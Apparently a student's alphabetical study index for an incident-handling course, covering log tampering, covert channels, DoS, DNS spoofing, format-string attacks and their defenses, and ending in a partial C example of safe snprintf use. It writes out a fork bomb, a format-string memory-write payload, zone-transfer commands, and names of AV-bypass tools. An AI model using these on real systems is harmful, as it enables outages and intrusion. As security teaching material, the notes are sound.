Covering Tracks: Log Editing - (Windows) (Book 5, p. 109)
c:\Windows\System32\winevt\Logs
-AppEvent.Evtx - Application-oriented events
-SecEvent.Evtx - Security events
-SysEvent.Evtx - System events (readable by all users)
Files are write-locked on a running system, stored in binary
--Attacker can delete logs or generate bogus logs to overwrite data
--both are easily noticed but can still hide important log information
** Theoretically an attacker could boot to Linux and edit the offline NTFS logs
-no public software exists, but the capability is there
Meterpreter clearev can wipe logs, currently no line-by-line ability
The three primary Windows event types are stored temporarily in these log files:
--SYSTEM.LOG
--SECURITY.LOG
--APPLICATION.LOG
These files are not readable for all practical purposes.
Each .LOG file is periodically rewritten into an .EVT format automatically, in the following files:
--SYSEVENT.EVTX
--SECEVENT.EVTX
--APPEVENT.EVTX
Covering Tracks: Log Editing - Unix/Linux (Book 5, p. 80)
Main log files can be found by viewing /etc/syslog.conf
- /var/log/secure
- /var/log/messages
- /var/log/httpd/error_log
- /var/log/httpd/access_log
These log files (usually in /var/log) are written in ASCII
They are often edited by hand using a text editor or script
--If the log is very large, they usually use a perl script to edit it

Covering Tracks: Shell History (Book 5, p. 81)
A list of the most recent N commands
- 500 by default in bash, although 1000 on some Linux distros
- ~/.bash_history, for example
Written in ASCII, and can be edited by hand with the permissions of the user or root
-Attackers remove suspicious commands
-Some even add commands to implicate some other user in the attack
**editing the history will leave a new entry that the history was edited
--only solution is to turn off history, but that is also an indicator in itself

Covering Tracks: Where attackers put Hidden UNIX files and Dirs (Book 5, p. 78)
Attackers want to put files in a place where they won't be noticed
Popular locations for hidden stuff include:
--/dev
--/tmp
--/etc
--Other complex components of the file system
----/usr/local/man
----/usr/src
----And numerous others

Covert Channel: Defenses (Book 5, p. 129)
Preparation
--Keep attackers off system in the first place (apply least privilege)
Identification
--Know what processes should be running on your systems
----When a strange process starts running, investigate
----Especially if it has admin/root privileges
--Network-based IDS can analyze packets for:
----Shell commands in HTTP (for reverse www shell)
----Unusual data in ICMP messages (for ICMP tunnels)
------False positives associated with network management equipment
----Unusual changes in IP ID and Seq/Ack fields (for Covert_TCP) -- pretty hard to do
***Focus on egress traffic

Covert Channel: Defenses (Book 5, p. 140)
Containment
--Delete attacker's program
--Look for program on other systems
Eradication:
--If attacker compromised admin/root account, rebuild system
Recovery:
--Monitor system very closely
Covert Channels in TCP and IP Headers (Book 5, p. 122)
Using extra space in the TCP or IP header
Covert_TCP
-Designed to transfer files
-Remarkably effective technique

Covert Channels: Other (Book 5, p. 127)
You can carry any protocol on top of any other protocol
DNS
--DNSCat2
Quick UDP Internet Connection (QUIC)
--Use of multiplexed UDP connections for connections
Stream Control Transmission Protocol (SCTP)
--Also uses multi-streaming to send data across multiple concurrent connections
--Supports multihoming so multiple endpoints can be used as failover
--This means it has built-in C2 server failover
The goal of attackers using odd protocols to transfer is to find new areas where existing signatures do not exist
Also, there are some issues with reassembly across multiple concurrent streams of data being sent
First protocol is encapsulated inside packets for second protocol
-Network only sees the second protocol

Covert Channels: Plain Sight (Book 5, p. 131)
Encrypted data might be an obvious sign of intrusion
Not all backdoors use plaintext to transmit data
Many use other protocols
--HTTPS
--IPSEC
--DNS
Others hide in plain sight:
--HTTP
Every custom web application has data and fields that are encoded and transmitted differently
--HTTP commonly has encoded portions (session data, etc.)
--attackers can hide by looking like normally encoded HTTP

Covert_TCP (Book 5, pp. 122-123)
Client and server are the same executable
Covert_TCP offers the ability to carry ASCII data in:
IP ID Field, Sequence Number Field, Acknowledgement Number Field

Covert_TCP: Bounce Mode (Book 5, p. 125)
Ack mode (also known as bounce mode)
Most complex mode of operation for Covert_TCP is using the TCP acknowledgement sequence number, which applies in a so-called "bounce" operation.
Step 0: Attacker establishes a Covert_TCP server on the receiving server, putting it in "ack" mode.
Step 1: The client generates TCP SYN packets with a spoofed source address of the receiving server and a destination address of the bounce server.
Step 2: The bounce server receives the packet. If the destination port on the bounce server is open, the bounce server will send a SYN/ACK response.....(see page)
Step 3: The receiving server gets the SYN/ACK or RESET, recovers the character from the sequence number field, and waits for more. The data is then gathered from the seq # and written to a local file
Covert_TCP: Extending the Ideas (Book 5, p. 126)
Transfer Trojan horse backdoor commands or a shell instead of just files
Bi-directional bounce attack
Use other fields in the TCP, IP, and ICMP headers
--Reserved space
--IP options
--ICMP message type

CoWPAtty (Book 2, p. 65)
****See War Driving: CoWPAtty
A dictionary-based cracking tool for pre-shared keys with WPA1 and WPA2
-must sniff the 4-way handshake

CpuHOG (Denial of Service) (Book 4, p. 147)
Creates a process with a high priority on a Windows machine. Sets its priority level to 16, higher than all others
-could not be killed by Windows apps
-took priority over all resources

Cracker (Book 2, p. 5)
Someone who maliciously breaks into a system

Creating Evil Macros (Book 3, p. 145)
See screenshot

Creating Malware: Macros (Book 3, p. 144)
Word macros are all the rage these days
And for the past 10+ years
However some users are getting wary of any macros in Word documents
Why not use PowerPoint?
--Because it does not support Auto_Open nor Workbook_Open
--There will be another prompt for the user
--Two prompts = low probability of success
One way is to create events for malware triggering
--Mouseover or clicking
We can also use Run_On_Open

CRIME (Book 3, p. 66)
Variant of BEAST that undermined HTTPS by focusing on compression routines
Data Execution Prevention (Book 3, p. 128)
XP SP2 and later: only works with processors that support execution protection on the stack (NX)
--marks memory pages as non-executable
--Metasploit modules can circumvent with return-oriented programming (ROP)

Data Manipulation Across the Web (SQL Injection) (Book 4, p. 98)
After the target user input string has been identified, use standard database logic elements and see what happens!
--Double dash (--): Comment delimiter
--Semicolon (;): Query terminator
--Asterisk (*): Wildcard selector
--Percent (%): Matches any substring
--Underscore (_): Matches any character
Other useful entities are OR, TRUE, 1=1, SELECT, JOIN, and UPDATE

Data Validation (Book 4, pp. 141-142)
You can view and edit anything that is passed to the browser
Any variable passed to the browser can be altered by the user unless the application performs integrity checks
Sometimes, 99.99% of all state information in an application is covered
But on one screen, a single variable is passed in the clear without a hash or timestamp
With just one piece of unprotected state, the application is vulnerable

DDoS - Attacks (Book 4, p. 156)
Use a large number of compromised machines
The result is Distributed Denial of Service (DDoS)
In the past, attackers relied on specialized DDoS tools:
-Tribe Flood Network (TFN) and Tribe Flood Network 2000 (TFN2K)
Today, DDoS is usually launched using a botnet
DDoS - Defenses (Book 4, pp. 163-164)
- host-based IDS/IPS
-To prevent attackers from gaining root or SYSTEM
- Keep systems patched
- Utilize antivirus tools to prevent installation and remote detection
** Egress antispoof filters (extremely important)
-Design critical business systems with adequate redundancy
Tools: Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, CloudFlare

DDoS - Defenses (Preparation) (Book 4, p. 163)
- host-based IDS/IPS
-To prevent attackers from gaining root or SYSTEM
- Keep systems patched
- Utilize antivirus tools to prevent installation and remote detection
** Egress antispoof filters (extremely important)
-Design critical business systems with adequate redundancy
Tools: Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, CloudFlare

DDoS - Flood (Book 4, p. 160)
SYN floods:
--Typically spoofed
--Clogs connection with bogus traffic
--Easier for ISPs to block by looking for abnormal traffic patterns
HTTP floods:
--3WH and send HTTP GET for common page, such as index.html
--Much harder to differentiate from normal traffic

DDoS - Reflected (Book 4, p. 158)
Using the TCP three-way handshake, an attacker can bounce a flood from the zombie to the victim
Zombie sends a SYN to legitimate site
Legit site sends a SYN/ACK to flood the victim
Makes tracing the attack even more difficult

DDoS Architecture (Book 4, p. 157)
View diagram. At the top of the architecture, you have the attacker who uses a remote control tool or remote shell to connect to one or more client machines.

DDoS: Additional Defenses (Book 4, p. 164)
ID: Massive flood of packets. Automated DDoS detection and throttling tools.
Containment: Get ready to marshal the incident response team of your ISP
DDoS: Defenses (Book 4, pp. 163-164)
Preparation:
--host-based IDS/IPS
--To prevent attackers from gaining root or SYSTEM
--Keep systems patched
--Utilize antivirus tools to prevent installation and remote detection
** Egress antispoof filters (extremely important)
-Design critical business systems with adequate redundancy
Tools: Arbor Networks Peakflow, Riverbed NetProfiler, Neustar SiteProtect, CloudFlare
Identification:
--Massive flood of packets. Automated DDoS detection and throttling tools.
Containment:
--Get ready to marshal the incident response team of your ISP
Erad, Recov: N/A

Defense: Reversing Windows Executables (Book 5, p. 20)
To counter packers, use unpackers or debugger plugins
Immunity Debugger - Very popular free Windows debugger
--Ollydbg (Windows) has dozens of unpacking scripts
www.openrce.org

Detecting Stego (Book 5, p. 149)
StegExpose: Java utility to detect stego in lossless images where Least Significant Bit (LSB) techniques are used
--This stego is where the LSBs which determine color are modified
--This leads to a very slight (think imperceptible) change of color made to the original image
Supports a number of different "detectors" or mathematical analysis techniques to detect stego
For quick analysis, it can also use "cheap" or quick analysis methods to detect the presence of stego
Has the ability to run on a large number of files very quickly

Determine Risk of Continuing Operations (Containment) (Book 1, p. 111)
Acquire logs and other sources of info. How far did the attacker get? Make recommendation for longer-term containment. Document recommendation in signed memo. Ultimately, it's a business decision, but they are informed by the incident handler's input.

Dictionary Attacks (Password Cracking) (Book 4, p. 11)
Involves using a predetermined list of passwords. It is the fastest method for cracking passwords.

Digital Millennium Copyright Act (DMCA) (Book 2, p. 9)
Copyright protection and prohibitions against reverse engineering copy-protection schemes

Direct anti-spoof (Book 3)
Checks the source address and interface on which the packet arrived to make sure they make sense. Requires admin to configure each set of addresses expected on each interface; takes a lot of work
Disabling LANMAN Authentication*** (Book 4, p. 32)
Stop storing LANMAN hashes in reg key:
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
-On the Edit menu, click Add Key, type NoLMHash, and click OK
Stop sending LANMAN Challenge/Response across the network:
LMCompatibilityLevel registry parameter
-Level 3 - Send NTLMv2 authentication only - good for clients
-Level 5 - Domain Controllers accept only NTLMv2

Disabling Linux/Unix Services Listening on Ports (Book 2, p. 105)
To stop a process on Linux or Unix, you can use "kill [pid]" or "killall [process_name]". You can also disable a service by reconfiguring inetd or /etc/xinetd.d. You can also use # systemctl list-units --type service and # systemctl disable <service>

DLL Injection (Book 5, p. 51)
Method of attacker injecting code in the form of a DLL directly into the victim EXE process's memory space.
DLL Injection requires several steps to be taken by the attacker, including:
--Allocating space in the victim's process for the DLL code to occupy
--Allocating space in the victim's process for the parameters required by the DLL to be injected into
--Writing the name and code of the DLL into the memory space of the victim process
--Creating a thread in the victim process to actually run the newly injected DLL
--Freeing up resources in the victim process after execution is completed
--Overwriting API calls.
**You can see which accounts on your local Windows system have Debug privileges by going to Start -> Run and typing "secpol.msc"

dlllist (Book 5, p. 23)
Lists the DLLs loaded by a process, as well as the command-line invocation of a process

DMESG messages (Book 2, p. 68)
Used to track all DHCP leases

DNS (Book 2, p. 24)
Contains detailed info about target, to include external IPs
-attackers will use nslookup or dig to interact with DNS servers
** zone transfers can reveal information about the internal network
-should be disabled except to specific, known DNS servers

DNS (Book 3, p. 88)
Clients use a "resolver" to access DNS servers
Most common DNS server is BIND (Berkeley Internet Name Domain)
DNS servers query each other
DNS does recursive queries. When a client wants to connect to a server it must resolve the server's name. The client's resolver checks the local files to see if it already knows the IP address. If not, the client requests the mapping of name to address (in the form of a DNS address record) from the local name server (which it locates based on information in UNIX's /etc/resolv.conf or in the Windows network control panel). The local name server receives the query. If it has the information cached from a previous lookup, it sends a response. If it doesn't have the information, it does a recursive lookup. When doing a recursive lookup, the local name server consults with the root name server to see if it has the address record. If the root name server does not have the information, it sends back a referral to the next server down the line, the "org" server. The local name server then queries the org name server.

DNS - Registration Attack (Book 3, p. 89)
Make a similar-looking domain name

DNS Amplification Attacks (Book 4, p. 149)
Attack that involves using spoofed packets against a 3rd party to amplify traffic to a target. Attack also involves sending small, spoofed DNS queries to a series of DNS servers on the Internet.
DNS and nslookup (Book 2, p. 24)
The Domain Name System is full of useful information about a target
The attacker's goal is to discover as many IP addresses associated with the target domain as possible
The nslookup command can be used to interact with a DNS server to gather this data
--Included in modern versions of Windows
--Included in most UNIX implementations
--Deprecated in some UNIXes and limited on some Linux variants
Dig is another useful tool for DNS recon

dns blacklists (Book 3, p. 132)
Looks for evil entries in DNS cache

DNS Cache Poisoning (Book 3, pp. 88-89)
Attempt to spoof DNS response to poison the cache
-Make the source port of DNS queries difficult to predict
-Do not accept piggybacked responses
-use hard-to-predict Query IDs
-Configure external DNS servers to perform recursive queries only from internal systems
-keep DNS server updated

DNS Cache Poisoning - Kaminsky (Book 3, pp. 91-93)
New technique to DNS poison
--sent random requests and brute-forced the response to generate an "evil" redirect

DNS Cache Poisoning - Defenses (Book 3, p. 97)
Identification: use nslookup, dig, or ping to check a DNS cache entry
--Flush DNS server cache
Containment
--Flush DNS server cache
--Procedure depends on DNS server type
Eradication and Recovery
--Make sure to upgrade DNS server ASAP
--Pseudo-random UDP source ports
--Difficult to guess DNS query IDs
--Consider split-split DNS if a frequent problem

DNS Cache Poisoning: Scenario (Book 3, p. 90)
See screenshots

DNS Cache Poisoning - Defenses: Preparation (Book 3, p. 94)
Make the source port of DNS queries difficult to predict
--That way, responses with bad port numbers are rejected
--Makes the attack more difficult, because the bad guy must predict both the Query ID number and the UDP port
--Patch your DNS servers
Do not accept piggybacked responses and use a hard-to-predict Query ID
--Keep DNS server (BIND, Windows DNS, DJB DNS, and others) up-to-date
Configure external DNS servers to perform recursive queries only for internal systems
--Don't let anyone on the Internet cause your external DNS server to do recursive lookups
--Prevent steps 1-4 from scenario
--A configuration option in major DNS server types
--This can be dodged by sending e-mail and causing the mail server to look up a name using the external name server

DNS Cache Poisoning - Defenses: Preparation (Book 3, p. 96)
Use SSL (HTTPS) with server-side authentication
Harden your DNS server
Digitally sign DNS records (DNSSEC)

DNS Cache Poisoning - Defenses: Split-Split DNS (Book 3, p. 95)
Preparation: Use split-split DNS
--Have a different DNS server resolve names for insiders and not respond to outside queries at all
--Best current solution, but not widely used (too complex/expensive)
DNS Data (Enterprise-Wide IR) (Book 1, p. 133)
DNS can be used to ID well-known botnets and C2 channels
-can spot anomalies and malicious IP addresses
** Compare DNS cache to Malware Domain List, use a tool like dns-blacklists.py

DNS Recon: Defense (Book 2, p. 27)
Preparation:
--Don't allow zone transfers from just any system
----Limit zone transfers so the primary DNS server accepts zone requests initiated only by secondary and tertiary DNS servers, no one else
--Use split DNS
----External name information in external server
----Internal name information in internal server
--Make sure DNS servers are hardened
----All internal and external DNS servers
Identification:
--Look for zone transfers (in DNS server logs or data transferred to/from TCP port 53)
Cont, Erad, Recov: N/A

DNS Spoofing Effects (Book 3, p. 57)
The attacker doesn't have to be on the same LAN as the victim for DNS spoofing to work

DNS Spoofing: Bettercap (Book 3, pp. 58-59)
See screenshots

DNS Zone Transfer: Unix (Book 2, p. 26)
dig @<DNS server> <target domain> -t AXFR
-limit zone transfers, split DNS between internal and external

DNS Zone Transfer: Windows (Book 2, p. 25)
By dumping records from your DNS servers, attackers can determine which machines are accessible on the Internet
Using nslookup, information can be gathered
Type
--nslookup
--server [DNSServer]
--set type=any
--ls -d [domain]

DNS: Extra (Book 3, p. 89)
Done on TCP port 53
Each DNS query has a Query ID (sometimes called a Transaction ID number)
A response has the same Query ID number as the associated query
This Query ID may be predictable based on the earlier Query IDs
Also, to lower traffic requirements, DNS servers cache answers

dnscat2 (Book 5, p. 127)
Covert channel over DNS

DNSSpoof (Book 3, p. 60)
Step 1: Run the DNSSpoof program, which listens for any DNS query for the target domain
Step 2: Victim tries to resolve a name using DNS
Step 3: Attacker sniffs DNS request from the line
Step 4: Sends spoofed DNS response with any IP address the attacker wants the victim to use
Step 5: Victim now surfs to attacker's site instead of desired destination
Domain Name Registration (Book 2, p. 18)
When registering a domain name the registrar requests
--Postal address
--Phone numbers
--Names of points of contact
--Authoritative domain name servers
This information can be used in an attack
--Social engineering, war dialing, war driving, scanning
Contact names: social engineering, duping users via the telephone into giving up useful information
Telephone numbers: war dialing, finding unsecured modems to infiltrate an internal network
Postal addresses: war driving, finding unsecured wireless access points to attack
IP addresses: scanning, looking for openings in the target

Doo (Book 4, p. 78)
Tool that searches for VMware-specific virtualized hardware

DoS - Amplification Attacks (Book 4, pp. 150-153)
Send a small spoofed DNS query to several DNS servers
-all the DNS servers respond to the victim with a packet flood

DoS - CpuHOG (Book 4, p. 147)
Sets its priority level to 16, higher than all others
-could not be killed by Windows apps
-took priority over all resources

DoS - Denial of Service (Book 4, p. 146)
Stopping Services and Exhausting Resources (pg 147)
--CPUhog is a resource-exhaustion local DoS
You can also locally DoS a Linux system with a fork bomb
- :(){:|:&};:

DoS - EDNS (Book 4, p. 150)
With EDNS (RFC 2671), a DNS query can specify a larger buffer (bigger than 512 bytes) for the response
- attacker sends 60-byte query to get a 4000-byte response
-Has been used in attacks to generate well over 10 Gbps of traffic at the target
***attacker needs DNS servers supporting recursive lookups
-attacker queries those servers for a DNS name the attacker owns
-attacker's DNS caches 4000-byte response on those servers
-poisoned DNS caches are used to amplify DNS response flood

DoS: Types (Book 4, p. 147)
Two types of Denial of Service attacks:
--Local DoS
--Network based

Driftnet (Book 3, p. 53)
Doesn't even send the second HTTP request to fetch data. Instead, it monitors HTTP looking for JPEG images, which it sniffs and reconstitutes on the screen
It monitors HTTP looking for JPEG images

Drive Duplicator and Write Blockers (Containment) (Book 1, p. 110)
Drive duplicators are nice but may not capture unallocated space
-Consider buying write-blocking hardware, Tableau for example
-Destination drive bigger than source drive, at least 10%

droidsheep (Book 3, p. 63)
Mobile Firesheep. Downgrades SSL to HTTP

Dsniff (Book 2, p. 6)
Suite of tools that make sniffing and spying easy
Dsniff - SSL and SSH (Book 2, p. 6)
Step 1: Run the DNSSpoof program and webmitm or sshmitm
Step 2: Victim tries to resolve a name using DNS
Step 3: The victim's browser establishes an SSL connection (with the webmitm process on the attacker's machine)
Step 4: Webmitm establishes its own SSL connection with the real destination web server
Step 5: The victim sees a message saying that the web server's cert isn't signed by a recognized Certificate Authority (CA). But, most users simply continue the session! As the user accesses the website all traffic appears on the attacker's machine
The same process applies for SSH
Essentially, webmitm and sshmitm are proxy tools used to exploit a trust model based on the user knowing what is okay and what is not

Dsniff Components (Book 2, p. 6)
Dsniff, arpspoof, macof, tcpkill, tcpnice, msgsnarf, filesnarf, mailsnarf, URLsnarf, WebSpy, DNSSpoof, Webmitm, SSHmitm
Dsniff is a suite of sniffers and sniffer "helpers"
Dsniff, the master program of the suite, is merely a sniffer that decodes
See slide for protocols that are decoded by dsniff

Easy-Creds (Book 2, p. 67)
Helps create malicious WAPs

Easy-Creds: Attack Stack (Book 2, p. 68)
See page

Editing Assembly (Book 3, p. 149)
push <reg>
pop <reg>
Where <reg> is the name of the register in the xor.

Editing Logs w/Physical Access (Book 5, p. 110)
With physical access, an attacker could boot to Linux and edit the Windows logs directly with a specialized tool
A Linux boot disk for editing the Windows password database (SAM) can be found at http://pogostick.net/~pnh/ntpasswd
--Be careful when using this on a machine with EFS on Windows XP and 2003
--You will likely lose the EFS keys if you change the password on them
This program cannot be used to edit logs

EDNS (DNS Amplification Attack) (Book 4, p. 150)
With EDNS (RFC 2671), a DNS query can specify a larger buffer (bigger than 512 bytes) for the response
- attacker sends 60-byte query to get a 4000-byte response
-Has been used in attacks to generate well over 10 Gbps of traffic at the target
***attacker needs DNS servers supporting recursive lookups
-attacker queries those servers for a DNS name the attacker owns
-attacker's DNS caches 4000-byte response on those servers
-poisoned DNS caches are used to amplify DNS response flood

E-Mail - Gathering Evidence (Unauthorized Use) (Book 1, p. 165)
Collect evidence as soon as you ID a problem:
-All logs from employee's server(s) and e-mail server(s)
-Logs from organization's mail relay(s), even if you are SURE it is internal
-Firewall/intrusion detection logs
-When comparing logs, be certain to account for clock drift
**Problems tend to get to you long after they began; logs are perishable
Endpoint Security Bypass: External Access (Book 3, p. 141)
95%+ of all infections come from a user clicking on something or getting phished
Can't we just say that most attackers just "Phish and be done"?
AV Bypass
Application Whitelisting Bypass
AV_NG Bypass Tricks
Non-attribution

Endpoint Security Bypass: Some Techniques (Application Whitelisting) (Book 3, p. 151)
Backdoor Factory
Uses code caves
Ebowla
--Environmental keyed payloads + golang
--Multiple formats
Try code signing your malware

Enterprise-Wide IR (Book 1, p. 131)
Use tools and techniques to monitor a large network and ID compromise: web proxy, DNS cache, connection logs
-use logs from network devices, etc. (firewall, DNS, proxy, router)
-serve as filter points for all traffic, can ID anomaly

enum (Book 2, p. 136)
See SMB Enumeration, lab on pg 162


Get rid of the attacker's artifacts on the machine
Determine cause and symptoms of the incident
Eradication 1 116 - Use information gathered during identification and containment
- Try to isolate the attack and determine how it was executed
Usually against corporations, not governments
-motivated by money, stealing corporate data from competition
Many cases of unauthorized access to corporate systems are for espionage purpose
- typically involves a trusted insider

Espionage 1 158 Need to determine most likely targets (what, how, why, etc)
-ID how attackers would gain access, develop monitoring/controls
Thumbprint critical files and search for keywords
- Custom network-based IDS signatures
- Custom firewall/IPS signature-matching technology

Protect critical monitoring data:


- Records from badge access systems
- Phone records from your organization's PBX
Espionage - Maximize - Log books
1 161
Data Collection - System logs
- Network logs
- Surveillance videos

Espionage - Purposely
1 162
Deceiving the Attackers
If an outsider is collecting info, you may be able to provide erroneous info and actually benefit from the incident
Espionage -Identification 1 160 Pay attention to some indicators such as before/after hours access, work weekends,voluteering to empty paper recycling.
Pattern of access violations in audit trails. Leak seeding (media leaks)

Espionage Preparation -
1 159 Ask what the most probable targets of the activity are? What is the info worth? Who(outside the organization) might benefit
Target Analysis
from having it? What are all possible ways to acquire these targets? What are 2 or 3 most likely ways to acquire targets?
Ettercap (Book 3, pp. 67, 71):
  Session hijacker for Linux.
  --Passive sniffing, with filter on IP or MAC address
  --Active sniffing with ARP cache poisoning techniques
Event Definition (Book 1, p. 12):
  Any observable occurrence in a system and/or network.
  EX: The system boot sequence; a system crash (could be normal behavior for that system)
  ***Must be recorded in notebooks and logs
  Recording the same event in multiple places helps improve evidence; that's corroborating evidence
exe vs. exe-only (Book 3, p. 143):
  msfvenom/Metasploit by default utilizes a number of different template .exe files to inject malware into. While many AV vendors have a difficult time writing the exact signature for properly encoded malware, it is far easier to write a signature for the wrapping .exe the malware is put into. So they write a signature for that. There is an interesting flag in msfvenom to change the format to exe-only rather than exe. This flag has the effect of either creating a new section header or modifying the existing .text section in the case of 64-bit binaries. In the case of 32-bit binaries, the shellcode ends up in the .text section regardless; however, the characteristics flags differ and some extra assembly code is introduced in the exe-only version.
Executive Summary (Book 1, p. 14):
  Incident handling is similar to first aid
  The caregiver is under pressure and mistakes can be costly
  A simple, well understood, documented approach is best
  Keep the six stages in mind: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned
  Use predesigned forms and ask for help
  -http://www.sans.org/score/incidentforms
  -Forms include Incident Contact List, Identification Checklist, Eradication Checklist and Comm Log
  Additional materials available are:
  -NIST's Computer Security Incident Handling Guide, Revision 2
Extra Startup Items (Windows Cheat Sheet) (Book 1, p. 70):
  It's helpful to check users' autostart folders: C:\> dir /s /b "C:\Documents and Settings\[user_name]\Start Menu\"
Eyewitness (Book 2, p. 99): Takes screenshots of websites, VNC and RDP servers
Fast Flux / Fast Flux Bots (Book 4, p. 70):
  Rapid switching of bot controller
  --accomplished through a DNS server friendly to the attacker
  --adds extra layers of obscurity
Fast Flux: Round Robin (Book 4, p. 72):
  The round-robin DNS records have a short DNS TTL:
  --Perhaps 3 to 10 minutes
  --Continuously repopulated with new bots running transparent HTTP proxies
  --Double-flux techniques make the attacker's DNS server fluctuate in a similar fashion
Fiddler (Book 4, p. 139): Amazing proxy tool for analysis of HTTP requests and responses, with plugins that support altering scripts passing through the proxy on the fly, and highlighted/colored components of HTTP and HTML to make them more readable.
File and Protocol Parser Vulnerabilities (Book 3, p. 139):
  Be careful with programs that parse protocols and files
  -All network-using apps do
  -Most other file-reading apps do as well
  -Pay special attention to your sniffer tools and their associated analysis programs
  -Usually installed on sensitive networks (DMZ, data centers) to monitor
  -Whenever you have Wireshark, Snort, tcpdump, NetMon, or any other sniffer installed, make sure you keep patches up-to-date
FilePwn (Book 3, p. 53): MitMf plugin that allows backdoors to be inserted into executable files in transit
filescan (Book 5, p. 23): Lists the files that each process had open
filesnarf (Book 3, p. 51): Saves files captured from NFS to the local host
FIN Scans (Book 2, p. 94): Send packets with the FIN control bit set in an effort to be stealthy and get through the firewall
Firebug-Browsers (Book 4, p. 137): Firefox web page and script editor and development tool
Firefox SSL Warning Message (Book 3, p. 61): See screenshots
firesheep (Book 3, p. 68): Downgrades webpages from SSL to HTTP; a method for avoiding SSL warnings
Firewalk (Book 2):
  Used to send packets through a packet filter (firewall or router, no proxy) to determine which ports are open through it. Uses TTL on TCP or UDP. Needs the IP of the firewall, so the tool can try to walk through it by manipulating the TTL during the port scan.
Firewalk Defense (Book 2):
  Disallow ICMP Time Exceeded messages.
  --Use a proxy server instead.
FOCA (Book 2, p. 41): Automates the search for file types on a webpage; can extract metadata
Foiling DNS (Book 3, p. 56):
  Step 1: Attacker runs MitMf, which listens for any DNS query for the target domain
  Step 2: The victim runs a program that tries to resolve the target domain name, such as a web browser.
  Step 3: The tool sees the request. To sniff this request in a switched environment, the attacker may have to use the ARP cache poisoning techniques discussed in ARP Spoofing, so that the attacker can see the DNS query traffic from the victim
  Step 4: The MitMf tool sends a DNS response, spoofed to appear that it comes from the victim's DNS server. This response includes a lie about the IP address of the target domain.
  Step 5: The victim now surfs wherever the attacker wants him/her to. The victim thinks it's the real destination.
Forensics Images (Containment) (Book 1, p. 109):
  Make a forensic, bit-by-bit image as soon as feasible
  --take notes of all commands given and system responses
  **Create a hash of the original and your images
  Memory imaging can be done with Volatility or Memoryze
Format String - printf (Book 3, p. 141):
  printf("%s", buffer);   red text = the format string
  If you forget the %s... printf(buffer); the buffer itself is interpreted as the format!
  Unfortunately, the wrong way still compiles without complaints
  The wrong way also runs "properly"
  - The program thinks the string is a format that looks like "[string_contents]"
Format String - Read the Stack (Book 3, p. 146):
  Attacker enters "%x %x %x" into user_input
  -Becomes snprintf(buffer, sizeof buffer, "%x %x %x");
  -Buffer now contains the next three hexadecimal values on the stack
  -We're grabbing stuff from the stack
  -By expanding this, we can grab the contents of various nearby locations in memory
Format String - snprintf (Book 3, p. 144):
  snprintf(char *str, size_t size, const char *format, ...);
  Our program does
  snprintf(buffer, sizeof buffer, .... user_input);   <----- Forgot the format string (in red)
Format String Attacks (Book 3, p. 140):
  The printf command has a weakness if used incorrectly
  -Read arbitrary information from memory
  -Manipulate information anywhere in memory
  By manipulating information anywhere in memory, an attacker can have complete control over the victim process
  -If the victim process runs with root or admin privileges, the attacker can own the system
Format String Attacks - Curious Use (Book 3, p. 143):
  User input containing quotes ("), %x, %d and/or %n is likely a format string attack
Format String - Writing Anywhere in Memory (Book 2, p. 160):
  Note that the memory location cannot contain a value of 0x00 in it, because this causes the printf function to stop processing. snprintf, printf and sprintf always stop when they reach a null character (0x00)
Format Strings - %n (Book 3, p. 148):
  The "%n" format in a printf command makes printf store the number of characters that should have been output before encountering the %n
  -This number is stored in the address indicated by the next argument of printf
  printf("Hello world!%n", &variable);
  -Loads the number 12 into variable
  We are *writing* to memory using printf
Format Strings - Rewriting Memory Locations (Book 3, pp. 149 - 157):
  Suppose the attacker wants to alter a variable at address 0xbffffac0
  -attacker could try printing portions of the stack as we saw 2 slides ago
  Attacker enters "\xc0\xfa\xff\xbf%d%n" into user_input
  snprintf(buffer, sizeof buffer, "\xc0\xfa\xff\xbf%d%n");
  The characters \xc0\xfa\xff\xbf are written to the string
  Hex translated into ASCII: four ASCII chars are printed into buffer
  - That's 32 bits (from the size of the address itself)
  It sees the %d (for decimal integer), which prints the next value on the stack into the buffer (this won't get in the way)
  %n makes it write the number of characters printed (5)
  -- In the memory space pointed to by its next argument, the buffer
  The next item on the stack is the buffer, which we just loaded with 0xbffffac0
  -We loaded them for the little-endian Intel CPU
  We just wrote the number 5 into memory location 0xbffffac0
  ***useful to change permissions
  * minimum of 4 chars.... cannot write a value smaller than 5
Format Strings - Defenses (Book 2, p. 164):
  Preparation
  -Your program developers must make sure they explicitly use format strings in all printf, sprintf, fprintf and snprintf function calls
  Awareness training for developers
  Heavy use of grep to search for errors
  -Insist that your vendors do the same
  Deploy patches as they become available
  Ident, Cont, Erad, Recov:
  -Same as buffer overflow defenses
Format Strings - So What (Book 2, p. 162):
  Attacker can alter the value stored at any memory address
  -Overwrite return pointers on the stack to redirect program execution to the attacker's code
  -Change parameters
  - Change security settings (like an application-level user ID)
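Added example (not from the course material or this cheat sheet): a C program that puts the corrected call from the Format String entries beside the %n counting behaviour from the "Hello world!" example and implements the indicator from the "Curious Use" entry as a check on user input. The function names (copy_input_safely, safe_copy_is_literal, percent_n_demo, count_format_directives) and the sample inputs are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not course code.  The vulnerable pattern from the notes is
 *
 *     snprintf(buffer, sizeof buffer, user_input);    (user_input IS the format)
 *
 * so "%x %x %x" in user_input reads three stack words into buffer and "%n"
 * writes through whatever address the next stack slot holds.  It is kept in
 * this comment only; the functions below are the corrected form plus checks. */

#define BUF_SIZE 64

/* Correct: user input is the argument of an explicit "%s" format. */
int copy_input_safely(char *buffer, size_t size, const char *user_input)
{
    return snprintf(buffer, size, "%s", user_input);
}

/* 1 if hostile text is stored verbatim rather than interpreted as a format. */
int safe_copy_is_literal(const char *user_input)
{
    char buffer[BUF_SIZE];
    copy_input_safely(buffer, sizeof buffer, user_input);
    return strcmp(buffer, user_input) == 0;
}

/* The %n behaviour from the notes: the number of characters output before
 * %n (12 for "Hello world!") is stored through the pointer argument.  The
 * format is a string literal here, so the write lands exactly where intended. */
int percent_n_demo(void)
{
    int variable = 0;
    char scratch[32];
    snprintf(scratch, sizeof scratch, "Hello world!%n", &variable);
    return variable;
}

/* Indicator from the "Curious Use" entry: count printf conversions in user
 * input, parsed the way printf would (flags, width, precision, length
 * modifier, then a conversion letter).  "%%" is a literal percent sign and
 * does not count.  A non-zero result in data that should be plain text
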